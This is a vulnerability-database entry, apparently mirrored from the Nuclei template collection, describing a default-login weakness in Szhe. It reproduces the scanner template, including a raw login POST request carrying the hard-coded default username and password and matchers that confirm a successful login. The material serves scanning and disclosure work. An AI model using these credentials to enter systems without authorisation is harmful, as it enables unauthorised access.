szhe-default-login: Szhe Default Login

日期: 2025-08-01 | 影响软件: Szhe | POC: 已公开

漏洞描述

Szhe default login information was discovered.

PoC代码[已公开]

id: szhe-default-login

info:
  name: Szhe Default Login
  author: pikpikcu
  severity: medium
  description: Szhe default login information was discovered.
  reference:
    - https://github.com/Cl0udG0d/SZhe_Scan
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    cvss-score: 5.8
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: szhe,default-login,vuln

http:
  - raw:
      - |
        POST /login/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        email={{username}}&password={{password}}&remeber=true

    payloads:
      username:
        - springbird@qq.com
      password:
        - springbird
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'You should be redirected automatically to target URL: <a href="/">/</a>'

      - type: word
        words:
          - 'Set-Cookie: session'
        part: header

      - type: status
        status:
          - 302
# digest: 4b0a00483046022100f66e2dc802a0cb92e2c21af9c1ec8db1a12d5535d6227c43a1b7c299eee9f7cd022100f8a905a6a877ae20ec094f00eda445fee155bfbda952335239dcc1a3f83b6065:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/szhe/szhe-default-login.yaml